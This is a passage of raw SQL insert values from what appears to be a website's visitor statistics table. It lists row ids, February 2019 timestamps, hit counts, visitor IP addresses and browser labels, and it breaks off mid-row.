(388503,1550644458,1,1,0,0,'46.229.168.145','other'),(388504,1550644476,2,2,0,0,'207.46.13.212','other'),(388505,1550644545,1,1,0,0,'176.110.134.2','chrome'),(388506,1550644550,1,1,0,0,'54.36.148.57','other'),(388507,1550644695,1,1,0,0,'40.77.167.26','other'),(388508,1550645032,1,1,0,0,'94.154.218.157','chrome'),(388509,1550645125,1,1,0,0,'46.229.168.139','other'),(388510,1550645307,1,1,0,0,'91.196.178.71','firefox'),(388511,1550645404,1,1,0,0,'54.36.148.120','other'),(388512,1550645541,1,1,0,0,'66.249.66.156','chrome'),(388513,1550645700,1,1,0,0,'46.229.168.149','other'),(388514,1550645887,1,1,0,0,'216.244.66.241','other'),(388515,1550645931,1,1,0,0,'54.36.149.82','other'),(388516,1550645932,1,1,0,0,'54.36.148.132','other'),(388517,1550645996,1,1,0,0,'60.191.38.77','firefox'),(388518,1550646224,1,1,0,0,'54.36.149.2','other'),(388519,1550646344,1,1,0,0,'66.249.66.44','chrome'),(388520,1550646454,1,1,0,0,'54.36.149.74','other'),(388521,1550646760,1,1,0,0,'178.154.171.27','other'),(388522,1550646892,1,1,0,0,'54.36.148.147','other'),(388523,1550646915,1,1,0,0,'54.36.148.165','other'),(388524,1550647659,1,1,0,0,'54.36.148.167','other'),(388525,1550647712,1,1,0,0,'54.36.148.35','other'),(388526,1550647776,2,2,0,0,'207.46.13.212','other'),(388527,1550647883,1,1,0,0,'40.77.167.26','other'),(388528,1550648061,1,1,0,0,'54.36.148.17','other'),(388529,1550648092,1,1,0,0,'95.163.255.186','other'),(388530,1550648224,2,2,0,0,'207.46.13.198','other'),(388531,1550648420,1,1,0,0,'54.36.148.213','other'),(388532,1550648439,1,1,0,0,'54.36.148.13','other'),(388533,1550648616,1,1,0,0,'8.29.198.26','other'),(388534,1550648617,1,1,0,0,'54.36.148.114','other'),(388535,1550648684,1,1,0,0,'54.36.148.236','other'),(388536,1550648714,1,1,0,0,'95.163.255.95','other'),(388537,1550648749,1,1,0,0,'91.196.178.176','chrome'),(388538,1550648801,1,1,0,0,'46.229.168.140','other'),(388539,1550648833,1,1,0,0,'54.36.148.48','other'),(388540,1550648919,1,1,0,0,'54.36.148.176','other'),(388541,1550649035,1,1,0,0,'54.36.148.54','other'),(388542,1550649100,1,1,0,0,'91.196.177.46','chrome'),(388543,1550649310,1,1,0,0,'95.163.255.99','other'),(388544,1550649353,1,1,0,0,'95.132.36.101','firefox'),(388545,1550649609,1,1,0,0,'94.154.218.157','chrome'),(388546,1550649622,1,1,0,0,'54.36.148.119','other'),(388547,1550649822,1,1,0,0,'77.111.247.60','chrome'),(388548,1550649830,1,1,0,0,'46.229.168.144','other'),(388549,1550650055,1,1,0,0,'8.29.198.26','other'),(388550,1550650108,1,1,0,0,'5.45.207.19','other'),(388551,1550650194,1,1,0,0,'54.36.148.57','other'),(388552,1550650197,1,1,0,0,'54.36.148.214','other'),(388553,1550650452,1,1,0,0,'54.36.149.92','other'),(388554,1550650569,1,1,0,0,'194.44.179.191','firefox'),(388555,1550650601,1,1,0,0,'94.154.218.157','chrome'),(388556,1550650694,1,1,0,0,'54.36.149.30','other'),(388557,1550650845,1,1,0,0,'51.158.25.147','msie'),(388558,1550650998,1,1,0,0,'54.36.148.175','other'),(388559,1550651327,1,1,0,0,'37.53.90.175','chrome'),(388560,1550651515,1,1,0,0,'46.229.168.137','other'),(388561,1550651762,1,1,0,0,'91.124.182.170','firefox'),(388562,1550651834,1,1,0,0,'54.36.148.64','other'),(388563,1550651841,1,1,0,0,'46.229.168.147','other'),(388564,1550651875,1,1,0,0,'91.196.177.46','chrome'),(388565,1550652035,1,1,0,0,'54.36.148.234','other'),(388566,1550652517,2,2,0,0,'54.36.148.211','other'),(388567,1550652956,1,1,0,0,'54.36.148.12','other'),(388568,1550653181,1,1,0,0,'54.36.148.249','other'),(388569,1550653203,1,1,0,0,'54.36.149.65','other'),(388570,1550653736,1,1,0,0,'46.229.168.151','other'),(388571,1550653921,1,1,0,0,'95.163.255.170','other'),(388572,1550654007,1,1,0,0,'91.196.178.94','chrome'),(388573,1550654032,1,1,0,0,'46.229.168.136','other'),(388574,1550654416,1,1,0,0,'95.163.255.178','other'),(388575,1550654419,1,1,0,0,'95.163.255.179','other'),(388576,1550654433,1,1,0,0,'178.251.106.252','chrome'),(388577,1550654492,1,1,0,0,'207.46.13.198','other'),(388578,1550654613,1,1,0,0,'95.163.255.96','other'),(388579,1550654735,1,1,0,0,'91.196.178.186','chrome'),(388580,1550654762,1,1,0,0,'54.36.148.16','other'),(388581,1550654841,1,1,0,0,'46.229.168.146','other'),(388582,1550654903,1,1,0,0,'66.249.66.152','chrome'),(388583,1550655173,1,1,0,0,'54.36.149.1','other'),(388584,1550655202,1,1,0,0,'54.36.149.103','other'),(388585,1550655228,1,1,0,0,'54.36.148.189','other'),(388586,1550655235,1,1,0,0,'91.196.177.46','firefox'),(388587,1550655257,1,1,0,0,'91.196.178.79','chrome'),(388588,1550655411,1,1,0,0,'54.36.149.20','other'),(388589,1550655525,2,2,0,0,'66.249.66.156','chrome'),(388590,1550655858,1,1,0,0,'54.36.148.205','other'),(388591,1550655897,1,1,0,0,'54.36.148.193','other'),(388592,1550655903,1,1,0,0,'46.229.168.144','other'),(388593,1550656035,1,1,0,0,'91.196.177.228','chrome'),(388594,1550656593,1,1,0,0,'207.46.13.40','other'),(388595,1550656647,1,1,0,0,'54.36.148.194','other'),(388596,1550656896,1,1,0,0,'91.124.182.170','firefox'),(388597,1550657085,1,1,0,0,'95.163.255.195','other'),(388598,1550657253,1,1,0,0,'66.249.66.156','chrome'),(388599,1550657264,1,1,0,0,'178.92.146.38','chrome'),(388600,1550657321,2,2,0,0,'95.213.141.126','opera'),(388601,1550657414,1,1,0,0,'54.36.148.255','other'),(388602,1550657429,1,1,0,0,'95.163.255.188','other'),(388603,1550657582,1,1,0,0,'207.46.13.40','other'),(388604,1550657633,1,1,0,0,'46.219.6.7','chrome'),(388605,1550657792,1,1,0,0,'141.8.183.11','other'),(388606,1550657796,1,1,0,0,'91.196.177.46','firefox'),(388607,1550657902,1,1,0,0,'46.229.168.137','other'),(388608,1550657923,1,1,0,0,'54.36.149.20','other'),(388609,1550657969,1,1,0,0,'91.196.178.66','chrome'),(388610,1550658196,1,1,0,0,'54.36.148.108','other'),(388611,1550658943,1,1,0,0,'54.36.148.91','other'),(388612,1550659157,1,1,0,0,'46.229.168.130','other'),(388613,1550659202,1,1,0,0,'66.249.66.44','chrome'),(388614,1550659287,3,3,0,0,'216.244.66.241','other'),(388615,1550659468,1,1,0,0,'8.29.198.27','other'),(388616,1550659562,1,1,0,0,'54.36.148.126','other'),(388617,1550659623,1,1,0,0,'40.77.167.62','other'),(388618,1550659664,1,1,0,0,'54.36.148.183','other'),(388619,1550659815,1,1,0,0,'91.196.178.189','chrome'),(388620,1550659872,1,1,0,0,'95.163.255.161','other'),(388621,1550659889,1,1,0,0,'66.249.66.152','chrome'),(388622,1550659929,1,1,0,0,'46.229.168.139','other'),(388623,1550659993,1,1,0,0,'54.36.149.78','other'),(388624,1550660082,1,1,0,0,'95.163.255.177','other'),(388625,1550660679,1,1,0,0,'95.163.255.95','other'),(388626,1550660703,1,1,0,0,'54.36.148.134','other'),(388627,1550660897,1,1,0,0,'8.29.198.27','other'),(388628,1550660924,1,1,0,0,'40.77.167.218','other'),(388629,1550661149,1,1,0,0,'46.229.168.132','other'),(388630,1550661156,1,1,0,0,'54.36.148.197','other'),(388631,1550661541,1,1,0,0,'54.36.149.107','other'),(388632,1550661728,1,1,0,0,'54.36.148.168','other'),(388633,1550661920,1,1,0,0,'216.244.66.241','other'),(388634,1550662018,1,1,0,0,'54.36.149.8','other'),(388635,1550662195,1,1,0,0,'178.92.146.38','chrome'),(388636,1550662303,1,1,0,0,'37.115.97.186','chrome'),(388637,1550662482,1,1,0,0,'93.170.68.93','chrome'),(388638,1550662647,1,1,0,0,'66.249.66.154','chrome'),(388639,1550662671,1,1,0,0,'54.36.148.39','other'),(388640,1550662964,1,1,0,0,'66.249.66.42','chrome'),(388641,1550662995,1,1,0,0,'46.229.168.153','other'),(388642,1550663140,1,1,0,0,'85.115.35.180','other'),(388643,1550663251,1,1,0,0,'54.36.148.232','other'),(388644,1550663359,1,1,0,0,'66.249.66.44','chrome'),(388645,1550663476,1,1,0,0,'46.219.6.7','chrome'),(388646,1550664177,1,1,0,0,'178.154.171.27','other'),(388647,1550664213,1,1,0,0,'66.249.66.154','chrome'),(388648,1550664233,1,1,0,0,'216.244.66.241','other'),(388649,1550664321,1,1,0,0,'130.180.219.195','chrome'),(388650,1550664428,1,1,0,0,'54.36.148.140','other'),(388651,1550664559,1,1,0,0,'40.77.167.62','other'),(388652,1550664678,1,1,0,0,'178.92.209.178','opera'),(388653,1550664932,1,1,0,0,'95.163.255.95','other'),(388654,1550664945,1,1,0,0,'46.229.168.132','other'),(388655,1550665395,1,1,0,0,'54.36.148.212','other'),(388656,1550665451,1,1,0,0,'54.36.148.248','other'),(388657,1550665501,1,1,0,0,'91.196.178.61','chrome'),(388658,1550665733,1,1,0,0,'95.163.255.94','other'),(388659,1550665846,1,1,0,0,'54.36.148.35','other'),(388660,1550665848,1,1,0,0,'54.36.149.93','other'),(388661,1550665866,1,1,0,0,'91.124.182.170','firefox'),(388662,1550665868,1,1,0,0,'54.36.148.133','other'),(388663,1550665870,1,1,0,0,'207.46.13.215','other'),(388664,1550665889,1,1,0,0,'91.196.178.161','chrome'),(388665,1550665975,1,1,0,0,'66.249.66.152','chrome'),(388666,1550666021,1,1,0,0,'95.163.255.96','other'),(388667,1550666130,1,1,0,0,'95.163.255.179','other'),(388668,1550666287,1,1,0,0,'91.196.177.46','firefox'),(388669,1550666351,1,1,0,0,'54.36.149.71','other'),(388670,1550666362,1,1,0,0,'46.229.168.138','other'),(388671,1550666664,1,1,0,0,'216.244.66.241','other'),(388672,1550666780,1,1,0,0,'54.36.149.101','other'),(388673,1550666802,1,1,0,0,'66.249.66.154','chrome'),(388674,1550666927,1,1,0,0,'37.53.90.175','chrome'),(388675,1550667094,1,1,0,0,'207.46.13.198','other'),(388676,1550667252,1,1,0,0,'91.196.178.87','chrome'),(388677,1550667389,1,1,0,0,'109.201.138.234','other'),(388678,1550667565,1,1,0,0,'46.229.168.151','other'),(388679,1550667677,1,1,0,0,'66.249.66.44','chrome'),(388680,1550667723,1,1,0,0,'46.229.168.133','other'),(388681,1550667746,2,2,0,0,'91.196.178.161','chrome'),(388682,1550667834,2,2,0,0,'66.249.66.154','chrome'),(388683,1550668000,1,1,0,0,'91.196.178.66','chrome'),(388684,1550668054,1,1,0,0,'66.249.66.152','chrome'),(388685,1550668962,1,1,0,0,'46.211.47.215','chrome'),(388686,1550669198,1,1,0,0,'91.196.178.83','firefox'),(388687,1550669620,1,1,0,0,'91.196.177.228','chrome'),(388688,1550669765,2,2,0,0,'91.196.178.66','chrome'),(388689,1550669982,1,1,0,0,'66.249.66.152','chrome'),(388690,1550670027,1,1,0,0,'95.163.255.95','other'),(388691,1550670144,2,1,1,0,'66.249.66.156',''),(388692,1550670338,1,1,0,0,'8.29.198.27','other'),(388693,1550670988,1,1,0,0,'46.229.168.144','other'),(388694,1550671140,1,1,0,0,'95.163.255.151','other'),(388695,1550671241,1,1,0,0,'46.229.168.147','other'),(388696,1550671369,1,1,0,0,'62.80.166.58','chrome'),(388697,1550671442,1,1,0,0,'95.163.255.96','other'),(388698,1550671455,1,1,0,0,'95.163.255.155','other'),(388699,1550671692,1,1,0,0,'66.249.66.40','chrome'),(388700,1550671755,1,1,0,0,'8.29.198.26','other'),(388701,1550671841,2,2,0,0,'66.249.66.154','chrome'),(388702,1550671945,1,1,0,0,'92.113.13.146','chrome'),(388703,1550672314,1,1,0,0,'91.196.178.83','firefox'),(388704,1550672356,1,1,0,0,'141.8.142.103','other'),(388705,1550672385,1,1,0,0,'91.196.177.228','chrome'),(388706,1550672482,1,1,0,0,'66.249.66.44','chrome'),(388707,1550672775,1,1,0,0,'216.244.66.241','other'),(388708,1550673110,1,1,0,0,'91.196.178.77','chrome'),(388709,1550673201,1,1,0,0,'37.53.90.175','chrome'),(388710,1550673375,1,1,0,0,'5.45.207.19','other'),(388711,1550673593,1,1,0,0,'95.132.18.216','chrome'),(388712,1550673903,1,1,0,0,'207.46.13.198','other'),(388713,1550674026,1,1,0,0,'46.229.168.146','other'),(388714,1550674601,1,1,0,0,'91.196.178.94','chrome'),(388715,1550675194,1,1,0,0,'66.249.66.42','chrome'),(388716,1550675207,1,1,0,0,'66.249.66.154','chrome'),(388717,1550675257,1,1,0,0,'78.111.190.172','firefox'),(388718,1550675404,1,1,0,0,'37.53.90.175','chrome'),(388719,1550675629,1,1,0,0,'95.163.255.92','other'),(388720,1550675651,1,1,0,0,'40.77.167.187','other'),(388721,1550675801,1,1,0,0,'40.77.167.62','other'),(388722,1550675927,2,2,0,0,'216.244.66.241','other'),(388723,1550676205,2,2,0,0,'66.249.66.152','chrome'),(388724,1550676407,1,1,0,0,'46.96.0.57','chrome'),(388725,1550676678,2,2,0,0,'66.249.66.40','chrome'),(388726,1550676960,1,1,0,0,'40.77.167.62','other'),(388727,1550677104,1,1,0,0,'66.249.66.156','chrome'),(388728,1550677768,1,1,0,0,'91.196.178.167','chrome'),(388729,1550677777,1,1,0,0,'37.55.59.141','firefox'),(388730,1550677805,1,1,0,0,'66.249.66.152','chrome'),(388731,1550678046,1,1,0,0,'216.244.66.241','other'),(388732,1550678615,2,2,0,0,'66.249.66.42','chrome'),(388733,1550678943,1,1,0,0,'66.249.66.44','chrome'),(388734,1550679187,1,1,0,0,'91.196.178.167','chrome'),(388735,1550679327,1,1,0,0,'46.211.25.178','chrome'),(388736,1550679481,1,1,0,0,'66.249.66.40','chrome'),(388737,1550680432,1,1,0,0,'54.36.148.252','other'),(388738,1550680647,1,1,0,0,'54.36.148.25','other'),(388739,1550681197,1,1,0,0,'8.29.198.26','other'),(388740,1550681352,1,1,0,0,'54.36.148.68','other'),(388741,1550681745,1,1,0,0,'54.36.150.187','other'),(388742,1550681874,1,1,0,0,'54.36.148.186','other'),(388743,1550681938,1,1,0,0,'40.77.167.151','other'),(388744,1550682112,1,1,0,0,'95.163.255.186','other'),(388745,1550682539,1,1,0,0,'54.36.148.104','other'),(388746,1550682610,1,1,0,0,'8.29.198.25','other'),(388747,1550683027,1,1,0,0,'95.163.255.156','other'),(388748,1550683030,1,1,0,0,'66.249.66.154','chrome'),(388749,1550683250,1,1,0,0,'157.55.39.96','other'),(388750,1550683285,1,1,0,0,'46.211.25.178','chrome'),(388751,1550683357,1,1,0,0,'40.77.167.151','other'),(388752,1550683451,1,1,0,0,'54.36.148.194','other'),(388753,1550683489,1,1,0,0,'54.36.149.90','other'),(388754,1550683565,1,1,0,0,'207.46.13.98','other'),(388755,1550683619,1,1,0,0,'54.36.148.114','other'),(388756,1550683686,1,1,0,0,'95.163.255.94','other'),(388757,1550683876,1,1,0,0,'54.36.148.22','other'),(388758,1550683879,1,1,0,0,'66.249.66.156','chrome'),(388759,1550683946,1,1,0,0,'54.36.148.97','other'),(388760,1550684113,1,1,0,0,'95.163.255.161','other'),(388761,1550684180,1,1,0,0,'54.36.150.98','other'),(388762,1550684319,1,1,0,0,'54.36.149.55','other'),(388763,1550684760,1,1,0,0,'54.36.150.55','other'),(388764,1550684808,1,1,0,0,'54.36.150.95','other'),(388765,1550685050,2,2,0,0,'66.249.66.154','chrome'),(388766,1550685499,1,1,0,0,'95.163.255.154','other'),(388767,1550685659,1,1,0,0,'54.36.148.167','other'),(388768,1550685760,1,1,0,0,'54.36.148.58','other'),(388769,1550685812,1,1,0,0,'54.36.150.121','other'),(388770,1550685909,1,1,0,0,'40.77.167.133','other'),(388771,1550686100,1,1,0,0,'66.249.66.44','chrome'),(388772,1550686734,1,1,0,0,'216.244.66.241','other'),(388773,1550686786,1,1,0,0,'54.36.150.118','other'),(388774,1550687112,1,1,0,0,'54.36.148.161','other'),(388775,1550687154,1,1,0,0,'95.163.255.95','other'),(388776,1550687592,1,1,0,0,'46.229.168.135','other'),(388777,1550687679,1,1,0,0,'54.36.150.141','other'),(388778,1550687910,1,1,0,0,'54.36.150.148','other'),(388779,1550688101,1,1,0,0,'91.196.178.75','firefox'),(388780,1550688589,1,1,0,0,'66.249.66.156','chrome'),(388781,1550688615,1,1,0,0,'66.249.66.42','chrome'),(388782,1550688753,1,1,0,0,'95.163.255.93','other'),(388783,1550688829,1,1,0,0,'66.249.66.152','chrome'),(388784,1550688831,1,1,0,0,'95.163.255.99','other'),(388785,1550689083,1,1,0,0,'54.36.148.193','other'),(388786,1550689166,2,2,0,0,'216.244.66.241','other'),(388787,1550689277,1,1,0,0,'46.229.168.153','other'),(388788,1550689394,1,1,0,0,'54.36.148.96','other'),(388789,1550689798,1,1,0,0,'54.36.148.51','other'),(388790,1550689799,1,0,1,0,'66.249.66.154',''),(388791,1550689818,1,1,0,0,'54.36.148.153','other'),(388792,1550689866,1,1,0,0,'66.249.66.156','chrome'),(388793,1550690011,1,1,0,0,'54.36.150.170','other'),(388794,1550690221,1,1,0,0,'54.36.148.184','other'),(388795,1550690226,1,1,0,0,'54.36.149.15','other'),(388796,1550690245,1,0,1,0,'66.249.66.40',''),(388797,1550690564,1,1,0,0,'54.36.149.84','other'),(388798,1550690689,1,1,0,0,'46.229.168.133','other'),(388799,1550690797,1,1,0,0,'54.36.148.56','other'),(388800,1550691218,2,2,0,0,'66.249.66.152','chrome'),(388801,1550691319,1,1,0,0,'46.229.168.132','other'),(388802,1550691374,1,1,0,0,'178.154.244.11','other'),(388803,1550691376,1,1,0,0,'5.45.207.19','other'),(388804,1550691598,1,1,0,0,'54.36.149.2','other'),(388805,1550691621,1,1,0,0,'54.36.150.127','other'),(388806,1550691740,1,1,0,0,'216.244.66.241','other'),(388807,1550691803,1,1,0,0,'54.36.149.15','other'),(388808,1550691884,1,1,0,0,'54.36.149.88','other'),(388809,1550691969,1,1,0,0,'54.36.148.156','other'),(388810,1550692047,1,1,0,0,'8.29.198.25','other'),(388811,1550692060,1,1,0,0,'95.163.255.178','other'),(388812,1550692072,1,1,0,0,'54.36.148.202','other'),(388813,1550692238,1,1,0,0,'157.55.39.95','other'),(388814,1550692380,1,1,0,0,'54.36.150.76','other'),(388815,1550692429,1,1,0,0,'54.36.150.148','other'),(388816,1550692668,1,1,0,0,'46.229.168.132','other'),(388817,1550693324,1,1,0,0,'66.249.66.156','chrome'),(388818,1550693461,1,1,0,0,'8.29.198.25','other'),(388819,1550693532,1,1,0,0,'54.36.149.38','other'),(388820,1550693829,1,1,0,0,'54.36.150.15','other'),(388821,1550694041,1,1,0,0,'54.36.150.104','other'),(388822,1550694143,1,1,0,0,'54.36.148.174','other'),(388823,1550694174,1,1,0,0,'46.229.168.130','other'),(388824,1550694308,2,2,0,0,'95.163.255.94','other'),(388825,1550694373,1,1,0,0,'216.244.66.241','other'),(388826,1550694418,1,1,0,0,'54.36.150.17','other'),(388827,1550694517,1,1,0,0,'95.163.255.95','other'),(388828,1550694724,1,1,0,0,'40.77.167.132','other'),(388829,1550694729,3,3,0,0,'207.46.13.166','other'),(388830,1550694733,5,5,0,0,'40.77.167.97','other'),(388831,1550695581,1,1,0,0,'54.36.148.106','other'),(388832,1550695781,1,1,0,0,'54.36.149.10','other'),(388833,1550695802,1,1,0,0,'66.249.66.44','chrome'),(388834,1550696134,1,1,0,0,'46.229.168.140','other'),(388835,1550696146,1,1,0,0,'95.163.255.160','other'),(388836,1550696325,3,3,0,0,'216.244.66.241','other'),(388837,1550696725,1,1,0,0,'46.166.137.214','other'),(388838,1550696732,1,1,0,0,'37.52.115.49','chrome'),(388839,1550697191,1,1,0,0,'54.36.148.145','other'),(388840,1550697200,1,1,0,0,'66.249.66.156','chrome'),(388841,1550697408,1,1,0,0,'66.249.66.42','chrome'),(388842,1550697632,1,1,0,0,'54.36.148.251','other'),(388843,1550698222,1,1,0,0,'46.229.168.142','other'),(388844,1550698225,1,1,0,0,'54.36.148.59','other'),(388845,1550698267,1,1,0,0,'54.36.150.93','other'),(388846,1550698467,1,1,0,0,'54.36.150.155','other'),(388847,1550698492,1,1,0,0,'95.163.255.165','other'),(388848,1550698570,1,1,0,0,'66.249.66.44','chrome'),(388849,1550698745,4,4,0,0,'66.249.66.152','chrome'),(388850,1550698811,1,1,0,0,'54.36.148.146','other'),(388851,1550698990,1,1,0,0,'95.163.255.153','other'),(388852,1550699187,3,3,0,0,'216.244.66.241','other'),(388853,1550699272,1,1,0,0,'54.36.150.7','other'),(388854,1550699356,1,1,0,0,'46.229.168.134','other'),(388855,1550699740,1,1,0,0,'95.163.255.161','other'),(388856,1550699888,1,1,0,0,'95.163.255.197','other'),(388857,1550700040,1,1,0,0,'54.36.148.111','other'),(388858,1550700058,1,1,0,0,'207.46.13.3','other'),(388859,1550700131,1,1,0,0,'216.244.66.241','other'),(388860,1550700282,1,1,0,0,'66.249.66.156','chrome'),(388861,1550700421,1,1,0,0,'66.249.66.152','chrome'),(388862,1550700628,1,1,0,0,'95.163.255.156','other'),(388863,1550700871,1,1,0,0,'54.36.150.136','other'),(388864,1550701171,1,1,0,0,'46.229.168.152','other'),(388865,1550701431,1,1,0,0,'54.36.148.212','other'),(388866,1550701552,1,1,0,0,'54.36.150.134','other'),(388867,1550701813,1,1,0,0,'54.36.150.48','other'),(388868,1550702011,1,1,0,0,'54.36.150.71','other'),(388869,1550702016,7,7,0,0,'216.244.66.241','other'),(388870,1550702120,1,1,0,0,'207.46.13.3','other'),(388871,1550702316,1,1,0,0,'54.36.148.112','other'),(388872,1550702498,2,2,0,0,'66.249.66.154','chrome'),(388873,1550702574,1,1,0,0,'54.36.150.37','other'),(388874,1550702862,1,1,0,0,'54.36.150.145','other'),(388875,1550702901,1,1,0,0,'8.29.198.26','other'),(388876,1550702905,1,1,0,0,'17.58.98.62','other'),(388877,1550703044,1,1,0,0,'54.36.150.25','other'),(388878,1550703454,1,1,0,0,'54.36.150.21','other'),(388879,1550703597,1,1,0,0,'66.249.66.40','chrome'),(388880,1550703758,1,1,0,0,'54.36.149.79','other'),(388881,1550704004,1,1,0,0,'54.36.148.28','other'),(388882,1550704257,1,1,0,0,'66.249.66.152','chrome'),(388883,1550704301,1,1,0,0,'95.163.255.197','other'),(388884,1550704303,1,1,0,0,'8.29.198.27','other'),(388885,1550704518,1,1,0,0,'95.163.255.154','other'),(388886,1550704540,1,1,0,0,'95.163.255.191','other'),(388887,1550704613,1,1,0,0,'54.36.148.199','other'),(388888,1550704641,1,1,0,0,'54.36.148.18','other'),(388889,1550704725,1,1,0,0,'66.249.66.44','chrome'),(388890,1550704761,2,2,0,0,'216.244.66.241','other'),(388891,1550704777,1,1,0,0,'95.163.255.165','other'),(388892,1550704882,1,1,0,0,'54.36.150.21','other'),(388893,1550704989,1,1,0,0,'46.229.168.132','other'),(388894,1550705305,1,1,0,0,'66.249.66.156','chrome'),(388895,1550705537,1,1,0,0,'95.163.255.154','other'),(388896,1550705684,1,1,0,0,'54.36.148.38','other'),(388897,1550706098,1,1,0,0,'95.163.255.187','other'),(388898,1550706216,1,1,0,0,'54.36.150.66','other'),(388899,1550706531,1,1,0,0,'46.229.168.129','other'),(388900,1550706546,1,1,0,0,'66.249.66.42','chrome'),(388901,1550706548,1,1,0,0,'185.193.125.168','chrome'),(388902,1550706599,1,1,0,0,'66.249.66.156','chrome'),(388903,1550706648,1,1,0,0,'195.123.221.122','chrome'),(388904,1550706663,1,1,0,0,'185.104.120.60','chrome'),(388905,1550706716,1,1,0,0,'54.36.150.175','other'),(388906,1550706832,1,1,0,0,'54.36.150.159','other'),(388907,1550707002,1,1,0,0,'54.36.150.43','other'),(388908,1550707059,1,1,0,0,'54.36.148.55','other'),(388909,1550707510,1,1,0,0,'157.55.39.94','other'),(388910,1550707555,1,1,0,0,'51.38.64.136','chrome'),(388911,1550707612,1,1,0,0,'199.249.230.79','chrome'),(388912,1550707707,2,2,0,0,'216.244.66.241','other'),(388913,1550707813,1,1,0,0,'171.25.193.20','chrome'),(388914,1550707829,1,1,0,0,'54.36.148.96','other'),(388915,1550707911,1,1,0,0,'180.76.15.138','other'),(388916,1550708100,1,1,0,0,'207.46.13.65','other'),(388917,1550708186,1,1,0,0,'66.249.66.42','chrome'),(388918,1550708445,1,1,0,0,'176.110.134.2','chrome'),(388919,1550708473,1,1,0,0,'157.55.39.94','other'),(388920,1550708793,1,1,0,0,'69.12.72.175','chrome'),(388921,1550708915,1,1,0,0,'54.36.150.170','other'),(388922,1550708929,1,1,0,0,'51.77.244.222','chrome'),(388923,1550709052,1,1,0,0,'54.36.150.86','other'),(388924,1550709199,1,1,0,0,'54.36.149.28','other'),(388925,1550709227,1,1,0,0,'199.249.230.64','chrome'),(388926,1550709518,1,1,0,0,'46.36.38.57','chrome'),(388927,1550709640,1,1,0,0,'66.249.66.44','chrome'),(388928,1550709722,1,1,0,0,'54.36.149.91','other'),(388929,1550709739,1,1,0,0,'66.249.66.156','chrome'),(388930,1550710071,1,1,0,0,'109.70.100.24','chrome'),(388931,1550710296,1,1,0,0,'95.163.255.189','other'),(388932,1550710342,1,1,0,0,'216.244.66.241','other'),(388933,1550710357,1,1,0,0,'54.36.148.173','other'),(388934,1550710386,1,1,0,0,'54.36.149.56','other'),(388935,1550710511,1,1,0,0,'109.70.100.20','chrome'),(388936,1550710562,1,1,0,0,'54.36.149.79','other'),(388937,1550711038,1,1,0,0,'66.249.66.40','chrome'),(388938,1550711257,1,1,0,0,'54.36.148.23','other'),(388939,1550711306,1,1,0,0,'66.249.66.156','chrome'),(388940,1550711384,1,1,0,0,'46.229.168.149','other'),(388941,1550711669,1,1,0,0,'54.36.150.97','other'),(388942,1550711725,1,1,0,0,'54.36.149.75','other'),(388943,1550712000,1,1,0,0,'40.77.167.112','other'),(388944,1550712038,1,1,0,0,'95.163.255.92','other'),(388945,1550712040,1,1,0,0,'95.163.255.94','other'),(388946,1550712080,1,0,1,0,'66.249.66.134',''),(388947,1550712247,1,1,0,0,'66.249.66.136','chrome'),(388948,1550712503,1,1,0,0,'66.249.66.138','chrome'),(388949,1550712772,1,1,0,0,'54.36.149.40','other'),(388950,1550712908,1,1,0,0,'54.36.149.48','other'),(388951,1550713013,3,3,0,0,'216.244.66.241','other'),(388952,1550713036,1,1,0,0,'54.36.150.89','other'),(388953,1550713624,1,1,0,0,'66.249.66.136','chrome'),(388954,1550713724,1,1,0,0,'54.36.149.66','other'),(388955,1550713748,1,1,0,0,'8.29.198.25','other'),(388956,1550713858,1,1,0,0,'199.249.230.80','chrome'),(388957,1550713901,1,1,0,0,'66.249.66.134','chrome'),(388958,1550713959,1,1,0,0,'66.249.66.138','chrome'),(388959,1550714103,1,1,0,0,'54.36.148.211','other'),(388960,1550714474,1,1,0,0,'54.36.148.115','other'),(388961,1550714491,1,1,0,0,'54.36.148.63','other'),(388962,1550714582,1,1,0,0,'54.36.150.28','other'),(388963,1550714821,1,1,0,0,'40.77.167.112','other'),(388964,1550714844,1,1,0,0,'66.249.66.134','chrome'),(388965,1550714908,1,1,0,0,'54.36.150.61','other'),(388966,1550715084,1,1,0,0,'66.249.66.138','chrome'),(388967,1550715148,1,1,0,0,'8.29.198.25','other'),(388968,1550715480,1,1,0,0,'54.36.150.87','other'),(388969,1550715498,1,1,0,0,'54.36.150.26','other'),(388970,1550715813,2,2,0,0,'40.77.167.112','other'),(388971,1550716058,1,1,0,0,'95.163.255.164','other'),(388972,1550716100,1,1,0,0,'66.249.66.138','chrome'),(388973,1550716252,1,1,0,0,'95.163.255.172','other'),(388974,1550716286,1,1,0,0,'54.36.149.34','other'),(388975,1550716400,1,1,0,0,'54.36.150.189','other'),(388976,1550716425,1,1,0,0,'54.36.150.31','other'),(388977,1550716586,1,1,0,0,'54.36.150.16','other'),(388978,1550716750,1,1,0,0,'207.46.13.226','other'),(388979,1550716839,1,1,0,0,'46.229.168.140','other'),(388980,1550716858,1,1,0,0,'40.77.167.112','other'),(388981,1550716872,1,1,0,0,'54.36.148.48','other'),(388982,1550717055,1,1,0,0,'54.36.148.8','other'),(388983,1550717159,2,2,0,0,'66.249.66.136','chrome'),(388984,1550717348,1,1,0,0,'54.36.149.0','other'),(388985,1550717359,1,1,0,0,'207.46.13.218','other'),(388986,1550717494,2,2,0,0,'66.249.66.134','chrome'),(388987,1550717646,1,1,0,0,'54.36.150.154','other'),(388988,1550717696,1,1,0,0,'95.163.255.194','other'),(388989,1550717773,1,1,0,0,'95.163.255.96','other'),(388990,1550718045,2,2,0,0,'54.213.155.35','chrome'),(388991,1550718394,1,1,0,0,'216.244.66.241','other'),(388992,1550718668,1,1,0,0,'54.36.148.59','other'),(388993,1550718739,1,1,0,0,'54.36.148.213','other'),(388994,1550718874,1,1,0,0,'54.36.149.100','other'),(388995,1550719182,1,1,0,0,'54.36.150.38','other'),(388996,1550719210,2,2,0,0,'66.249.66.138','chrome'),(388997,1550719702,1,1,0,0,'54.36.148.247','other'),(388998,1550719956,1,1,0,0,'54.36.150.69','other'),(388999,1550720016,1,1,0,0,'54.36.148.27','other'),(389000,1550720239,1,1,0,0,'54.36.148.172','other'),(389001,1550720919,1,1,0,0,'66.249.66.134','chrome'),(389002,1550721259,1,1,0,0,'54.36.148.147','other'),(389003,1550721294,1,1,0,0,'95.163.255.188','other'),(389004,1550721354,1,1,0,0,'216.244.66.241','other'),(389005,1550721420,1,1,0,0,'46.229.168.141','other'),(389006,1550721775,2,2,0,0,'95.163.255.94','other'),(389007,1550721912,1,1,0,0,'46.229.168.139','other'),(389008,1550722027,1,1,0,0,'54.36.150.145','other'),(389009,1550722146,1,1,0,0,'95.163.255.92','other'),(389010,155072